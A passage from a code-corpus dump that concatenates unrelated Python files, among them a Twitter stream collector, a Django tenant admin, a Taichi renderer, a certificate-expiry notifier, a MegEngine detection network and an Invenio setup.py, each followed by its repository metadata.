print("RATE LIMITING", track)
sleep_seconds = self.backoff_strategy(track)
print("SLEEPING FOR:", sleep_seconds, "SECONDS...")
sleep(sleep_seconds)
@staticmethod
def backoff_strategy(i):
"""
Param: i (int) increasing rate limit number from the twitter api
Returns: number of seconds to sleep for
"""
return (int(i) + 1) ** 2 # raise to the power of two
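    # Worked example (added note; the numbers are illustrative): with the
    # quadratic strategy above, rate-limit notices with track = 0, 1, 2, 3
    # lead to sleeps of 1, 4, 9 and 16 seconds respectively.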
def on_timeout(self):
print("TIMEOUT!")
return True # don't kill the stream!
def on_warning(self, notice):
print("DISCONNECTION WARNING:", type(notice))
print(notice)
def on_disconnect(self, notice):
print("DISCONNECT:", type(notice))
if __name__ == "__main__":
listener = TweetCollector()
seek_confirmation()
listener.set_topics()
stream = Stream(listener.auth, listener)
print("STREAM", type(stream))
while True:
try:
stream.filter(track=listener.topics)
except ProtocolError:
print("--------------------------------")
print("RESTARTING AFTER PROTOCOL ERROR!")
continue
except TopicResetEvent as event:
print("--------------------------------")
print("RESTARTING AFTER TOPICS REFRESH!")
continue
# this never gets reached
| 5,598 |
customers/admin.py
|
klebercode/protocolle
| 0 |
2023610
|
# coding: utf-8
from django.contrib import admin, messages
from django.contrib.admin.helpers import ACTION_CHECKBOX_NAME
from django.template.response import TemplateResponse
from django.contrib.auth.models import User
from django.db import connection
from django.http import HttpResponseRedirect
from protocolle.core.models import Status, TipoInstituicao, Carater, Natureza
from models import Client
from forms import CreateAdminForm
def create_admin(self, request, queryset):
form = None
# u = User.objects.get(pk=request.user.pk)
if 'apply' in request.POST:
form = CreateAdminForm(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
email = form.cleaned_data['email']
password = <PASSWORD>data['password']
for obj in queryset:
connection.set_schema(obj.schema_name, include_public=False)
user = User.objects.create_user(username, email, password)
user.is_staff = True
user.is_active = True
user.is_superuser = True
user.save()
                # add the Status records
s = {'Tramitando', 'Arquivado', 'Parado', 'Entregue'}
status_check = Status.objects.filter(nome__in=s)
if not status_check:
for i in s:
new_status = Status(nome=i)
new_status.save()
                # add the TipoInstituicao records
ti = {'Externa', 'Interna'}
tipo_inst_check = TipoInstituicao.objects.filter(nome__in=ti)
if not tipo_inst_check:
for i in ti:
new_tipoinst = TipoInstituicao(nome=i)
new_tipoinst.save()
                # add the Carater records
c = {'Normal', 'Urgente'}
carater_check = Carater.objects.filter(nome__in=c)
if not carater_check:
for i in c:
new_carater = Carater(nome=i)
new_carater.save()
                # add the Natureza records
                n = {'Aberto', 'Confidencial'}
                natureza_check = Natureza.objects.filter(nome__in=n)
                if not natureza_check:
for i in n:
new_natureza = Natureza(nome=i)
new_natureza.save()
connection.set_schema_to_public()
messages.success(request, 'Admin "%s" para Cliente "%s": \
criado com sucesso.' % (username, obj.name))
return HttpResponseRedirect(request.get_full_path())
if not form:
form = CreateAdminForm(initial={'_selected_action':
request.POST.getlist(ACTION_CHECKBOX_NAME)})
# request=request)
opts = self.model._meta
app_label = opts.app_label
    module_name = opts.module_name
context = {
'title': "Criar Administrador",
'opts': opts,
'app_label': app_label,
'module_name': module_name,
'create_form': form,
}
return TemplateResponse(request, 'admin/create_admin.html',
context, current_app=self.admin_site.name)
create_admin.short_description = "Criar Administrador"
def drop_schema(self, request, queryset):
for obj in queryset:
if request.POST.get('post'):
cursor = connection.cursor()
cursor.execute('DROP SCHEMA %s CASCADE' % obj.schema_name)
obj.delete()
messages.success(request, 'Cliente "%s" e seus dados: removido \
com sucesso.' % obj.name)
else:
opts = self.model._meta
app_label = opts.app_label
            module_name = opts.module_name
context = {
'title': "Tem certeza que deseja continuar?",
'queryset': queryset,
'action_checkbox_name': ACTION_CHECKBOX_NAME,
'opts': opts,
'app_label': app_label,
'module_name': module_name,
}
return TemplateResponse(request, 'admin/drop_schema.html',
context, current_app=self.admin_site.name)
drop_schema.short_description = "Remover Clientes e Dados selecionados"
class ClientAdmin(admin.ModelAdmin):
list_per_page = 15
list_display = ['name', 'institute']
ordering = ['name']
actions = [drop_schema, create_admin]
admin.site.register(Client, ClientAdmin)
| 4,685 |
src/moilutils/__init__.py
|
MoilOrg/MoilApp
| 0 |
2023218
|
from moilutils.moilutils import MoilUtils
from moilutils.videoController import VideoController
from moilutils.sourceIcon import ResourceIcon
| 141 |
xcparse/Xcode/XCSchemeActions/BuildableProductRunnable.py
|
samdmarshall/xcparser
| 59 |
2023563
|
class BuildableProductRunnable(object):
def __init__(self, entry_item):
        self.contents = entry_item
| 116 |
src/fetch_geocoordinates_data.py
|
davidrpugh/wealth-of-cities
| 0 |
2023622
|
import geopy
import pandas as pd
import fetch_bea_data
def get_geo_coords(data, geolocator):
"""
Return a Pandas DataFrame storing the latitude and longitude coords.
Parameters
----------
data : DataFrame
Pandas DataFrame containing GeoName and GeoFips columns.
geolocator : object
GeoPy geolocator object used to fetch the latitude and longitude
coordinates.
Returns
-------
df : DataFrame
Pandas DataFrame containing the latitude and longitude coordinates
indexed by GeoFips code.
"""
geo_coords = {}
for i, geo_name in enumerate(data['GeoName']):
try:
clean_geo_name = geo_name[:-32] # drop (Metropolitan Statistical Area)
tmp_idx = data.iloc[i]['GeoFips']
tmp_loc = geolocator.geocode(clean_geo_name)
geo_coords[i] = {'GeoFips': tmp_idx,
'lat': tmp_loc.latitude,
'lng': tmp_loc.longitude}
except AttributeError:
print("Can't find " + geo_name + "!")
df = pd.DataFrame.from_dict(geo_coords, orient='index')
return df
# load the place names from the BEA data
data = fetch_bea_data.dataframe[['GeoName', 'GeoFips']].drop_duplicates()
# define a geolocator
geolocator = geopy.geocoders.GoogleV3(timeout=10)
# grab and save the geo_coordinates data
geo_coords = get_geo_coords(data, geolocator)
geo_coords.to_csv('../data/google/geocoordinates.csv')
| 1,490 |
rubbish.bin/legacy/taichi_three/geometry.py
|
Jack12xl/taichi_three
| 0 |
2023667
|
import math
import taichi as ti
import taichi_glsl as ts
from .transform import *
from .camera import *
@ti.func
def plucker(a, b):
l0 = a[0] * b[1] - b[0] * a[1]
l1 = a[0] * b[2] - b[0] * a[2]
l2 = a[0] - b[0]
l3 = a[1] * b[2] - b[1] * a[2]
l4 = a[2] - b[2]
l5 = b[1] - a[1]
return l0, l1, l2, l3, l4, l5
@ti.func
def plucker_sideop(a, b):
    res = a[0] * b[4] + a[1] * b[5] + a[2] * b[3] + a[3] * b[2] + a[4] * b[0] + a[5] * b[1]
return res
# https://members.loria.fr/SLazard/ARC-Visi3D/Pant-project/files/Line_Triangle.html
# https://www.cnblogs.com/flyuz/p/9471031.html
def plucker_bcoor(u, v, a, b, c):
ea = plucker(c, b)
eb = plucker(a, c)
ec = plucker(b, a)
L = plucker(u, v)
sa = plucker_sideop(L, ea)
sb = plucker_sideop(L, eb)
sc = plucker_sideop(L, ec)
return -sa, -sb, -sc
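# Added explanation (not in the original source): plucker_sideop is the permuted
# inner product of two Plucker lines, and the ray u->v crosses triangle a-b-c
# exactly when its side products sa, sb, sc against the three edge lines all
# share the same sign -- the test performed in intersect_triangle below.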
@ti.func
def intersect_triangle(model, orig, dir, face):
posa, posb, posc = face.pos
texa, texb, texc = face.tex
nrma, nrmb, nrmc = face.nrm
L2C = model.L2W[None]
posa = (L2C @ ts.vec4(posa, 1)).xyz
posb = (L2C @ ts.vec4(posb, 1)).xyz
posc = (L2C @ ts.vec4(posc, 1)).xyz
nrma = (L2C @ ts.vec4(nrma, 0)).xyz
nrmb = (L2C @ ts.vec4(nrmb, 0)).xyz
nrmc = (L2C @ ts.vec4(nrmc, 0)).xyz
tan, bitan = compute_tangent(posb - posa, posc - posa, texb - texa, texc - texa)
hit = 1e6
clr = ts.vec3(0.0)
sa, sb, sc = plucker_bcoor(orig, orig + dir, posa, posb, posc)
if (sa >= 0 and sb >= 0 and sc >= 0) or (sa <= 0 and sb <= 0 and sc <= 0):
snorm = sa + sb + sc
sa /= snorm
sb /= snorm
sc /= snorm
pos = posa * sa + posb * sb + posc * sc
tex = texa * sa + texb * sb + texc * sc
nrm = nrma * sa + nrmb * sb + nrmc * sc
if dir.dot(pos - orig) > 1e-4:
hit = (pos - orig).norm()
orig, dir, clr = model.material.radiance(model, pos, dir, tex, nrm, tan, bitan)
return hit, orig, dir, clr
# http://www.opengl-tutorial.org/cn/intermediate-tutorials/tutorial-13-normal-mapping/
@ti.func
def compute_tangent(dp1, dp2, duv1, duv2):
if ti.static(0):
return ts.vec3(0.0), ts.vec3(0.0)
IDUV = ti.Matrix([[duv1.x, duv1.y], [duv2.x, duv2.y]]).inverse()
DPx = ti.Vector([dp1.x, dp2.x])
DPy = ti.Vector([dp1.y, dp2.y])
DPz = ti.Vector([dp1.z, dp2.z])
T = ti.Vector([0.0, 0.0, 0.0])
B = ti.Vector([0.0, 0.0, 0.0])
T.x, B.x = IDUV @ DPx
T.y, B.y = IDUV @ DPy
T.z, B.z = IDUV @ DPz
return T, B
TAA_SHAKES = [(0, 0),
(1, 0), (0, -1), (-1, 0), (0, 1),
(1, 1), (-1, 1), (-1, -1), (1, -1),
]
@ti.func
def render_triangle(model, camera, face):
posa, posb, posc = face.pos # Position
texa, texb, texc = face.tex # TexCoord
nrma, nrmb, nrmc = face.nrm # Normal
pos_center = (posa + posb + posc) / 3
if ti.static(camera.type == camera.ORTHO):
pos_center = ts.vec3(0.0, 0.0, 1.0)
# NOTE: the normal computation indicates that a front-facing face should
# be COUNTER-CLOCKWISE, i.e., glFrontFace(GL_CCW);
# this is to be compatible with obj model loading.
if ts.dot(pos_center, ts.cross(posa - posc, posa - posb)) >= 0:
tan, bitan = compute_tangent(posb - posa, posc - posa, texb - texa, texc - texa) # TODO: node-ize this
clra = [posa, texa, nrma] # TODO: interpolate tan and bitan? merge with nrm?
clrb = [posb, texb, nrmb]
clrc = [posc, texc, nrmc]
A = camera.uncook(posa)
B = camera.uncook(posb)
C = camera.uncook(posc)
scr_norm = ts.cross(A - C, B - A)
if scr_norm != 0: # degenerate to 'line' if zero
B_A = (B - A) / scr_norm
A_C = (A - C) / scr_norm
shake = ts.vec2(0.0)
if ti.static(camera.fb.n_taa):
for i, s in ti.static(enumerate(map(ti.Vector, TAA_SHAKES[:camera.fb.n_taa]))):
if camera.fb.itaa[None] == i:
shake = s * 0.5
# screen space bounding box
M = int(ti.floor(min(A, B, C) - 1))
N = int(ti.ceil(max(A, B, C) + 1))
M = ts.clamp(M, 0, ti.Vector(camera.fb.res))
N = ts.clamp(N, 0, ti.Vector(camera.fb.res))
for X in ti.grouped(ti.ndrange((M.x, N.x), (M.y, N.y))):
# barycentric coordinates using the area method
X_A = X - A + shake
w_C = ts.cross(B_A, X_A)
w_B = ts.cross(A_C, X_A)
w_A = 1 - w_C - w_B
# draw
eps = ti.get_rel_eps() * 0.2
is_inside = w_A >= -eps and w_B >= -eps and w_C >= -eps
if not is_inside:
continue
# https://gitee.com/zxtree2006/tinyrenderer/blob/master/our_gl.cpp
if ti.static(camera.type != camera.ORTHO):
bclip = ts.vec3(w_A / posa.z, w_B / posb.z, w_C / posc.z)
bclip /= bclip.x + bclip.y + bclip.z
w_A, w_B, w_C = bclip
depth = (posa.z * w_A + posb.z * w_B + posc.z * w_C)
if camera.fb.atomic_depth(X, depth):
continue
posx, texx, nrmx = [a * w_A + b * w_B + c * w_C for a, b, c in zip(clra, clrb, clrc)]
color = ti.static(model.material.pixel_shader(model, posx, texx, nrmx, tan, bitan))
if ti.static(isinstance(color, dict)):
camera.fb.update(X, color)
else:
camera.fb.update(X, dict(img=color))
@ti.func
def render_line(model, camera, face, w0=0, w1=1):
posa, posb = face.pos # Position
texa, texb = face.tex # TexCoord
nrma, nrmb = face.nrm # Normal
clra = [posa, texa, nrma]
clrb = [posb, texb, nrmb]
A = camera.uncook(posa)
B = camera.uncook(posb)
M = int(ti.floor(min(A, B) - 1))
N = int(ti.ceil(max(A, B) + 1))
M = ts.clamp(M, 0, ti.Vector(camera.fb.res))
N = ts.clamp(N, 0, ti.Vector(camera.fb.res))
B_A = (B - A).normalized()
for X in ti.grouped(ti.ndrange((M.x, N.x), (M.y, N.y))):
udf = abs((X - A).cross(B_A))
if udf >= w1:
continue
strength = ts.smoothstep(udf, w1, w0)
color = ts.vec3(strength)
camera.img[X] += color
@ti.func
def render_particle(model, camera, index):
scene = model.scene
a = (model.L2C[None] @ ts.vec4(model.pos[index], 1)).xyz
r = model.radius[index]
A = camera.uncook(a)
rad = camera.uncook(ts.vec3(r, r, a.z), False)
M = int(ti.floor(A - rad))
N = int(ti.ceil(A + rad))
M = ts.clamp(M, 0, ti.Vector(camera.res))
N = ts.clamp(N, 0, ti.Vector(camera.res))
for X in ti.grouped(ti.ndrange((M.x, N.x), (M.y, N.y))):
pos = camera.cook(float(ts.vec3(X, a.z)))
dp = pos - a
dp2 = dp.norm_sqr()
if dp2 > r**2:
continue
dz = ti.sqrt(r**2 - dp2)
if camera.fb.atomic_depth(X, a.z - dz):
continue
n = ts.vec3(dp.xy, -dz)
normal = ts.normalize(n)
view = ts.normalize(a + n)
color = model.colorize(pos, normal)
camera.fb['img'][X] = color
camera.fb['normal'][X] = normal
| 7,289 |
natrixclient/command/http/httperror.py
|
creditease-natrix/natrixclient
| 9 |
2023449
|
# -*- coding: utf-8 -*-
class HttpError(object):
def __init__(self, url=None, timeout=None):
self.url = url
self.timeout = timeout
def connection_error(self):
data = {
"errorcode": 152,
"errorinfo": "Name or service not known {}".format(self.url)
}
result = {
"status": 1,
"data": data
}
return result
def connect_timeout(self):
data = {
"errorcode": 151,
"errorinfo": "Connection to {} timed out. (connect timeout={})".format(self.url, self.timeout)
}
result = {
"status": 1,
"data": data
}
return result
def read_timeout(self):
data = {
"errorcode": 153,
"errorinfo": "Read timed out. (read timeout={})".format(self.timeout)
}
result = {
"status": 1,
"data": data
}
return result
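
# Minimal usage sketch (added example; the URL and timeout values are
# illustrative, not part of the original module):
if __name__ == "__main__":
    err = HttpError(url="http://example.com", timeout=3)
    print(err.connection_error())
    print(err.connect_timeout())
    print(err.read_timeout())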
| 984 |
app/utils/notifications/event_type_expiration.py
|
BorysekOndrej/bakalarka3
| 1 |
2023372
|
import datetime
from typing import Dict, Tuple, Set, List
from loguru import logger
import app.db_models as db_models
from app.utils.notifications.connection_types import Notification, SlackNotification, MailNotification
from app.utils.notifications.event_types import EventType
from config import NotificationsConfig
class NotificationTypeExpiration(object):
def __init__(self, single_res, notification_preferences):
self.single_res = single_res
self.notification_preferences = notification_preferences
self.scan_order = single_res.ScanOrder
self.certificate_chain = single_res.LastScan.result.certificate_information.received_certificate_chain_list
self.days_remaining = (self.certificate_chain.not_after() - datetime.datetime.now()).days
self.event_type = EventType.ClosingExpiration if self.days_remaining >= 0 else EventType.AlreadyExpired
@staticmethod
def check_condition_and_create_notifications(main_data, notification_preferences_by_scan_order_id: Dict[str, dict])\
-> List[Notification]:
scan_order_ids_expired, scan_order_ids_nearing_expiration = NotificationTypeExpiration.check_condition(main_data, notification_preferences_by_scan_order_id)
notifications_to_send = NotificationTypeExpiration.create_notifications(main_data, notification_preferences_by_scan_order_id, scan_order_ids_expired, scan_order_ids_nearing_expiration)
return notifications_to_send
@staticmethod
def check_condition(main_data, notification_preferences_by_scan_order_id: Dict[str, dict])\
-> Tuple[Set, Set]:
expiration_by_target_id = {}
for single_res in main_data:
key = single_res.Target.id
val = single_res.ScanResults.certificate_information.received_certificate_chain_list.not_after()
expiration_by_target_id[key] = val
scan_order_ids_expired = set()
scan_order_ids_nearing_expiration = set()
for single_res in main_data:
scan_order_id = single_res.ScanOrder.id
target_id = single_res.ScanOrder.target_id
expires = expiration_by_target_id[target_id]
notification_settings = notification_preferences_by_scan_order_id[scan_order_id]
# todo: make filtering based on notification settings. Currently notifying about 1 day expire only
if expires < datetime.datetime.now():
scan_order_ids_expired.add(single_res.ScanOrder.id)
continue
if expires > datetime.datetime.now() + datetime.timedelta(
days=NotificationsConfig.start_sending_notifications_x_days_before_expiration):
continue
notifications_x_days_before_expiration \
= extract_and_parse_notifications_x_days_before_expiration(notification_settings)
certificate_chain = single_res.LastScan.result.certificate_information.received_certificate_chain_list
not_after = certificate_chain.not_after()
days_remaining = (not_after - datetime.datetime.now()).days
if days_remaining in notifications_x_days_before_expiration:
scan_order_ids_nearing_expiration.add(single_res.ScanOrder.id)
logger.info(f"scan_order_ids_expired orders ids: {scan_order_ids_expired}")
logger.info(f"scan_order_ids_nearing_expiration ids: {scan_order_ids_nearing_expiration}")
return scan_order_ids_expired, scan_order_ids_nearing_expiration
@staticmethod
def create_notifications(main_data, notification_preferences_by_scan_order_id: Dict[str, dict],
scan_order_ids_expired: Set, scan_order_ids_nearing_expiration: Set) -> List[Notification]:
notifications_to_send = []
for single_res in main_data:
scan_order_id = single_res.ScanOrder.id
if single_res.ScanOrder.id not in scan_order_ids_expired and \
single_res.ScanOrder.id not in scan_order_ids_nearing_expiration:
continue
final_pref = notification_preferences_by_scan_order_id[scan_order_id]
new_rec = NotificationTypeExpiration(single_res, final_pref)
notifications_to_send.extend(new_rec.craft_mails())
notifications_to_send.extend(new_rec.craft_slacks())
return notifications_to_send
def event_id_generator(self):
return f'{self.scan_order.id};{self.event_type};{self.certificate_chain.id};{self.days_remaining}'
def craft_mails(self) -> List[MailNotification]:
email_preferences = self.notification_preferences.get("email")
notifications_to_send = []
for single_mail_connection in email_preferences:
scan_order: db_models.ScanOrder = self.single_res.ScanOrder
target = scan_order.target
days_remaining = self.days_remaining
res = MailNotification()
res.event_id = self.event_id_generator()
res.recipient_email = single_mail_connection["email"]
            if self.event_type == EventType.ClosingExpiration:
res.subject = f"Certificate expiration notification ({target}) - {days_remaining} days remaining"
else:
res.subject = f"Certificate expiration notification ({target}) - Expired days {days_remaining} ago"
# todo: use flask templating
res.text = res.subject # todo
notifications_to_send.append(res)
return notifications_to_send
def craft_plain_text(self):
# fallback when more specific function for channel is not available
# todo: actual plaintext
return self.event_id_generator()
def craft_slacks(self) -> List[SlackNotification]:
channel_preferences = self.notification_preferences.get("slack")
notifications_to_send = []
for single_slack_connection in channel_preferences:
res = SlackNotification()
res.event_id = self.event_id_generator()
res.connection_id = single_slack_connection["id"]
res.text = self.craft_plain_text()
notifications_to_send.append(res)
return notifications_to_send
def extract_and_parse_notifications_x_days_before_expiration(pref: dict) -> set:
notifications_x_days_before_expiration = set()
notifications_x_days_before_expiration_string =\
pref.get("notifications_x_days_before_expiration",
NotificationsConfig.default_pre_expiration_periods_in_days)
notifications_x_days_before_expiration_list_of_strings = notifications_x_days_before_expiration_string.split(",")
for x in notifications_x_days_before_expiration_list_of_strings:
if x:
notifications_x_days_before_expiration.add(int(x))
return notifications_x_days_before_expiration
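
# Worked example (added note; the preference dict is hypothetical): a setting of
# {"notifications_x_days_before_expiration": "1,7,30"} parses to the set
# {1, 7, 30}, so a certificate whose days_remaining equals 7 is flagged as
# nearing expiration by check_condition above.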
| 6,884 |
model/emd_simple/network.py
|
niqbal996/CrowdDetection
| 252 |
2023022
|
import numpy as np
import megengine as mge
import megengine.functional as F
import megengine.module as M
from config import config
from backbone.resnet50 import ResNet50
from backbone.fpn import FPN
from module.rpn import RPN
from layers.roi_pool import roi_pool
from det_opr.bbox_opr import bbox_transform_inv_opr
from det_opr.fpn_roi_target import fpn_roi_target
from det_opr.loss_opr import softmax_loss, smooth_l1_loss
from det_opr.utils import get_padded_tensor
class Network(M.Module):
def __init__(self):
super().__init__()
# ----------------------- build the backbone ------------------------ #
self.resnet50 = ResNet50()
# ------------ freeze the weights of resnet stage1 and stage 2 ------ #
if config.backbone_freeze_at >= 1:
for p in self.resnet50.conv1.parameters():
p.requires_grad = False
if config.backbone_freeze_at >= 2:
for p in self.resnet50.layer1.parameters():
p.requires_grad = False
# -------------------------- build the FPN -------------------------- #
self.backbone = FPN(self.resnet50)
# -------------------------- build the RPN -------------------------- #
self.RPN = RPN(config.rpn_channel)
# ----------------------- build the RCNN head ----------------------- #
self.RCNN = RCNN()
# -------------------------- input Tensor --------------------------- #
self.inputs = {
"image": mge.tensor(
np.random.random([2, 3, 224, 224]).astype(np.float32), dtype="float32",
),
"im_info": mge.tensor(
np.random.random([2, 5]).astype(np.float32), dtype="float32",
),
"gt_boxes": mge.tensor(
np.random.random([2, 100, 5]).astype(np.float32), dtype="float32",
),
}
def forward(self, inputs):
images = inputs['image']
im_info = inputs['im_info']
gt_boxes = inputs['gt_boxes']
# process the images
normed_images = (
images - config.image_mean[None, :, None, None]
) / config.image_std[None, :, None, None]
normed_images = get_padded_tensor(normed_images, 64)
if self.training:
return self._forward_train(normed_images, im_info, gt_boxes)
else:
return self._forward_test(normed_images, im_info)
def _forward_train(self, image, im_info, gt_boxes):
loss_dict = {}
# stride: 64,32,16,8,4, p6->p2
fpn_fms = self.backbone(image)
rpn_rois, loss_dict_rpn = \
self.RPN(fpn_fms, im_info, gt_boxes)
rcnn_rois, rcnn_labels, rcnn_bbox_targets = fpn_roi_target(
rpn_rois, im_info, gt_boxes, top_k=2)
loss_dict_rcnn = self.RCNN(
fpn_fms, rcnn_rois, rcnn_labels, rcnn_bbox_targets)
loss_dict.update(loss_dict_rpn)
loss_dict.update(loss_dict_rcnn)
return loss_dict
def _forward_test(self, image, im_info):
fpn_fms = self.backbone(image)
rpn_rois = self.RPN(fpn_fms, im_info)
pred_bbox = self.RCNN(fpn_fms, rpn_rois)
pred_score = pred_bbox[:, -1][:, None]
pred_bbox = pred_bbox[:, :-1] / im_info[0, 2]
pred_bbox = F.concat((pred_bbox, pred_score), axis=1)
return pred_bbox
class RCNN(M.Module):
def __init__(self):
super().__init__()
# roi head
self.fc1 = M.Linear(256*7*7, 1024)
self.fc2 = M.Linear(1024, 1024)
for l in [self.fc1, self.fc2]:
M.init.msra_uniform_(l.weight, a=1)
M.init.fill_(l.bias, 0)
# box predictor
self.emd_pred_cls_0 = M.Linear(1024, config.num_classes)
self.emd_pred_delta_0 = M.Linear(1024, config.num_classes * 4)
self.emd_pred_cls_1 = M.Linear(1024, config.num_classes)
self.emd_pred_delta_1 = M.Linear(1024, config.num_classes * 4)
for l in [self.emd_pred_cls_0, self.emd_pred_cls_1]:
M.init.normal_(l.weight, std=0.01)
M.init.fill_(l.bias, 0)
for l in [self.emd_pred_delta_0, self.emd_pred_delta_1]:
M.init.normal_(l.weight, std=0.001)
M.init.fill_(l.bias, 0)
def forward(self, fpn_fms, rcnn_rois, labels=None, bbox_targets=None):
# stride: 64,32,16,8,4 -> 4, 8, 16, 32
fpn_fms = fpn_fms[1:][::-1]
stride = [4, 8, 16, 32]
pool_features, rcnn_rois, labels, bbox_targets = roi_pool(
fpn_fms, rcnn_rois, stride, (7, 7), 'roi_align',
labels, bbox_targets)
flatten_feature = F.flatten(pool_features, start_axis=1)
roi_feature = F.relu(self.fc1(flatten_feature))
roi_feature = F.relu(self.fc2(roi_feature))
pred_emd_pred_cls_0 = self.emd_pred_cls_0(roi_feature)
pred_emd_pred_delta_0 = self.emd_pred_delta_0(roi_feature)
pred_emd_pred_cls_1 = self.emd_pred_cls_1(roi_feature)
pred_emd_pred_delta_1 = self.emd_pred_delta_1(roi_feature)
if self.training:
loss0 = emd_loss(
pred_emd_pred_delta_0, pred_emd_pred_cls_0,
pred_emd_pred_delta_1, pred_emd_pred_cls_1,
bbox_targets, labels)
loss1 = emd_loss(
pred_emd_pred_delta_1, pred_emd_pred_cls_1,
pred_emd_pred_delta_0, pred_emd_pred_cls_0,
bbox_targets, labels)
loss = F.concat([loss0, loss1], axis=1)
indices = F.argmin(loss, axis=1)
loss_emd = F.indexing_one_hot(loss, indices, 1)
loss_emd = loss_emd.sum()/loss_emd.shapeof()[0]
loss_dict = {}
loss_dict['loss_rcnn_emd'] = loss_emd
return loss_dict
else:
pred_scores_0 = F.softmax(pred_emd_pred_cls_0)[:, 1:].reshape(-1, 1)
pred_scores_1 = F.softmax(pred_emd_pred_cls_1)[:, 1:].reshape(-1, 1)
pred_delta_0 = pred_emd_pred_delta_0[:, 4:].reshape(-1, 4)
pred_delta_1 = pred_emd_pred_delta_1[:, 4:].reshape(-1, 4)
target_shape = (rcnn_rois.shapeof()[0], config.num_classes - 1, 4)
base_rois = F.add_axis(rcnn_rois[:, 1:5], 1).broadcast(target_shape).reshape(-1, 4)
pred_bbox_0 = restore_bbox(base_rois, pred_delta_0, True)
pred_bbox_1 = restore_bbox(base_rois, pred_delta_1, True)
pred_bbox_0 = F.concat([pred_bbox_0, pred_scores_0], axis=1)
pred_bbox_1 = F.concat([pred_bbox_1, pred_scores_1], axis=1)
#[{head0, pre1, tag1}, {head1, pre1, tag1}, {head0, pre1, tag2}, ...]
pred_bbox = F.concat((pred_bbox_0, pred_bbox_1), axis=1).reshape(-1,5)
return pred_bbox
def emd_loss(p_b0, p_c0, p_b1, p_c1, targets, labels):
pred_box = F.concat([p_b0, p_b1], axis=1).reshape(-1, p_b0.shapeof()[-1])
pred_box = pred_box.reshape(-1, config.num_classes, 4)
pred_score = F.concat([p_c0, p_c1], axis=1).reshape(-1, p_c0.shapeof()[-1])
targets = targets.reshape(-1, 4)
labels = labels.reshape(-1).astype(np.int32)
fg_masks = F.greater(labels, 0)
non_ignore_masks = F.greater_equal(labels, 0)
# mulitple class to one
indexing_label = (labels * fg_masks).reshape(-1,1)
indexing_label = indexing_label.broadcast((labels.shapeof()[0], 4))
pred_box = F.indexing_one_hot(pred_box, indexing_label, 1)
# loss for regression
loss_box_reg = smooth_l1_loss(
pred_box,
targets,
config.rcnn_smooth_l1_beta)
# loss for classification
loss_cls = softmax_loss(pred_score, labels)
loss = loss_cls*non_ignore_masks + loss_box_reg * fg_masks
loss = loss.reshape(-1, 2).sum(axis=1)
return loss.reshape(-1, 1)
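# Added note (not in the original source): emd_loss scores one particular
# assignment of the two per-proposal predictions (p_b0, p_c0) and (p_b1, p_c1)
# to the two ground-truth targets of each proposal; the RCNN forward pass above
# evaluates both orderings and keeps the per-proposal minimum via argmin, which
# is the set-based matching this model relies on.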
def restore_bbox(rois, deltas, unnormalize=True):
if unnormalize:
std_opr = mge.tensor(config.bbox_normalize_stds[None, :])
mean_opr = mge.tensor(config.bbox_normalize_means[None, :])
deltas = deltas * std_opr
deltas = deltas + mean_opr
pred_bbox = bbox_transform_inv_opr(rois, deltas)
return pred_bbox
| 8,148 |
setup.py
|
KonstantinaStoikou/invenio-access
| 0 |
2023112
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Invenio module for common role based access control."""
import os
from setuptools import find_packages, setup
readme = open('README.rst').read()
history = open('CHANGES.rst').read()
tests_require = [
'SQLAlchemy-Continuum>=1.2.1',
'cachelib>=0.1',
'check-manifest>=0.25',
'coverage>=4.0',
'isort>=4.3.0',
'mock>=1.0.0',
'pydocstyle>=1.0.0',
'pytest-cov>=1.8.0',
'pytest-pep8>=1.0.6',
'pytest>=3.6.0',
'redis>=2.10.3'
]
extras_require = {
'docs': [
'Sphinx>=1.8.4,<3',
],
'mysql': [
'invenio-db[mysql]>=1.0.0',
],
'postgresql': [
'invenio-db[postgresql]>=1.0.0',
],
'sqlite': [
'invenio-db>=1.0.0',
],
'tests': tests_require,
}
extras_require['all'] = []
for name, reqs in extras_require.items():
if name in ('sqlite', 'mysql', 'postgresql'):
continue
extras_require['all'].extend(reqs)
setup_requires = [
'Babel>=1.3',
'pytest-runner>=2.6.2',
]
install_requires = [
'invenio-admin>=1.2.0',
'invenio-accounts>=1.2.1',
'invenio-base>=1.2.2',
'invenio-i18n>=1.2.0',
]
packages = find_packages()
# Get the version string. Cannot be done with import!
g = {}
with open(os.path.join('invenio_access', 'version.py'), 'rt') as fp:
exec(fp.read(), g)
version = g['__version__']
setup(
name='invenio-access',
version=version,
description=__doc__,
long_description=readme + '\n\n' + history,
keywords='invenio access',
license='MIT',
author='CERN',
author_email='<EMAIL>',
url='https://github.com/inveniosoftware/invenio-access',
packages=packages,
zip_safe=False,
include_package_data=True,
platforms='any',
entry_points={
'flask.commands': [
'access = invenio_access.cli:access',
],
'invenio_access.actions': [
'invenio_access.actions = '
'invenio_access.permissions:superuser_access',
],
'invenio_access.system_roles': [
'any_user = invenio_access.permissions:any_user',
'authenticated_user = '
'invenio_access.permissions:authenticated_user',
],
'invenio_admin.views': [
'invenio_access_action_users = '
'invenio_access.admin:action_users_adminview',
'invenio_access_action_roles = '
'invenio_access.admin:action_roles_adminview',
'invenio_access_action_system_roles = '
'invenio_access.admin:action_system_roles_adminview',
],
'invenio_base.api_apps': [
'invenio_access = invenio_access:InvenioAccess',
],
'invenio_base.apps': [
'invenio_access = invenio_access:InvenioAccess',
],
'invenio_db.alembic': [
'invenio_access = invenio_access:alembic',
],
'invenio_db.models': [
'invenio_access = invenio_access.models',
],
'invenio_i18n.translations': [
'messages = invenio_access',
],
},
extras_require=extras_require,
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_require,
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Development Status :: 5 - Production/Stable',
],
)
| 4,090 |
obmplib.py
|
omiddavoodi/obmplib
| 0 |
2023732
|
def read4bint(f, o):
ret = f[o+3]
ret *= 256
ret += f[o+2]
ret *= 256
ret += f[o+1]
ret *= 256
ret += f[o]
return ret
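# Worked example (added note; the byte values are illustrative): read4bint
# decodes a little-endian 32-bit integer, so bytes 0x01 0x02 0x03 0x04 at
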